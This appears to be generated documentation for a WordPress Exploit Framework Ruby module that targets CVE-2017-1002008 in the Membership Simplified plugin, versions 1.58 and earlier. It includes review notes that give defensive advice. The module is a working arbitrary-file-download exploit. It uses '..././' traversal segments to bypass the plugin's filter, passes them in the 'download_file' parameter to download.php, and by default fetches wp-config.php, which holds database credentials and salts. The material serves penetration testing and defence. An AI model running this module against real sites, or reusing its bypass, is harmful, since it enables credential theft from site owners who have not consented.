class Wpxf::Auxiliary::MembershipSimplifiedArbitraryFileDownload

Public Class Methods

new()
Calls superclass method Wpxf::WordPress::FileDownload::new
# File lib/wpxf/modules/auxiliary/file_download/membership_simplified_arbitrary_file_download.rb, line 6
# Sets up the module and registers its descriptive metadata.
#
# The metadata identifies the issue as CVE-2017-1002008, affecting
# Membership Simplified 1.58 and earlier. The description states that the
# plugin's own handling of "../" does not stop the "..././" form.
# NOTE(review): for defenders the durable fix is to upgrade the plugin and to
# resolve the requested path to its canonical form before comparing it
# against the directory downloads are allowed from.
def initialize
  super

  # Whitespace inside this literal is part of the string shown to the
  # operator, so its layout is kept exactly as published.
  summary = %(
      This module exploits a vulnerability which allows you to download
      any arbitrary file accessible by the user the web server is running
      as. Relative paths must use "..././" as opposed to "../", in order
      to bypass mitigation within the plugin.
    )

  credits = [
    'Larry W. Cashdollar', # Disclosure
    'rastating'            # WPXF module
  ]

  # Public advisories a reader can use to confirm affected versions.
  advisories = [
    ['CVE', '2017-1002008'],
    ['WPVDB', '8777'],
    ['URL', 'http://www.vapidlabs.com/advisory.php?v=187']
  ]

  update_info(
    name: 'Membership Simplified <= 1.58 Arbitrary File Download',
    desc: summary,
    author: credits,
    references: advisories,
    date: 'Mar 13 2017'
  )
end

Public Instance Methods

check()
# File lib/wpxf/modules/auxiliary/file_download/membership_simplified_arbitrary_file_download.rb, line 30
# Estimates whether the target is affected by reading the plugin version out
# of its readme.txt and handing it to the framework's version check with
# '1.59' as the boundary (presumably the first fixed release, which matches
# the "<= 1.58" in the module name; confirm against the helper).
#
# NOTE(review): this is a version-string check only. A site whose readme.txt
# is missing, blocked or edited cannot be judged from this result, so
# defenders should verify the installed plugin version directly.
#
# @return whatever check_version_from_custom_file returns
def check
  plugin_slug = 'membership-simplified-for-oap-members-only'
  readme_url = normalize_uri(wordpress_url_plugins, plugin_slug, 'readme.txt')

  # Matches changelog headings of the form "= Beta 1.58 =" and captures the
  # dotted version number.
  version_pattern = /\=\s+Beta\s+(\d+\.\d+(\.\d+)*)\s+\=/

  check_version_from_custom_file(readme_url, version_pattern, '1.59')
end
default_remote_file_path()
# File lib/wpxf/modules/auxiliary/file_download/membership_simplified_arbitrary_file_download.rb, line 35
# Default value for the remote file to request: wp-config.php, addressed
# three directory levels above the starting directory using the "..././"
# segment form.
#
# NOTE(review): wp-config.php normally holds the WordPress database
# credentials and authentication salts. If an affected site may have served
# this file, those secrets should be treated as disclosed and rotated.
#
# @return [String] the default relative path
def default_remote_file_path
  wp_config_relative = '..././..././..././wp-config.php'
  wp_config_relative
end
download_request_params()
# File lib/wpxf/modules/auxiliary/file_download/membership_simplified_arbitrary_file_download.rb, line 47
# Builds the request parameters for the download: a single 'download_file'
# entry carrying the configured remote file path.
#
# NOTE(review): for detection, the parameter name is the useful field here.
# 'download_file' values that contain directory-traversal segments in web
# server or WAF logs indicate attempts against this flaw.
#
# @return [Hash] a one-entry hash keyed by 'download_file'
def download_request_params
  params = {}
  params['download_file'] = remote_file
  params
end
downloader_url()
# File lib/wpxf/modules/auxiliary/file_download/membership_simplified_arbitrary_file_download.rb, line 43
# URL of the plugin's download.php script, built from the site's plugins URL
# and the plugin's directory name.
#
# NOTE(review): presumably the FileDownload base class sends the download
# request to this URL; confirm there. Defenders can restrict or monitor
# access to this script on sites that cannot be upgraded immediately.
#
# @return the normalized URL produced by normalize_uri
def downloader_url
  plugin_slug = 'membership-simplified-for-oap-members-only'
  normalize_uri(wordpress_url_plugins, plugin_slug, 'download.php')
end
working_directory()
# File lib/wpxf/modules/auxiliary/file_download/membership_simplified_arbitrary_file_download.rb, line 39
# Directory, relative to the WordPress root, that the download script is
# taken to run from. It is three levels deep, which matches the three
# traversal segments in the default remote file path.
#
# NOTE(review): presumably the base class uses this to describe how relative
# paths resolve on the target; confirm in Wpxf::WordPress::FileDownload.
#
# @return [String] the plugin directory path
def working_directory
  plugin_dir = 'wp-content/plugins/membership-simplified-for-oap-members-only'
  plugin_dir
end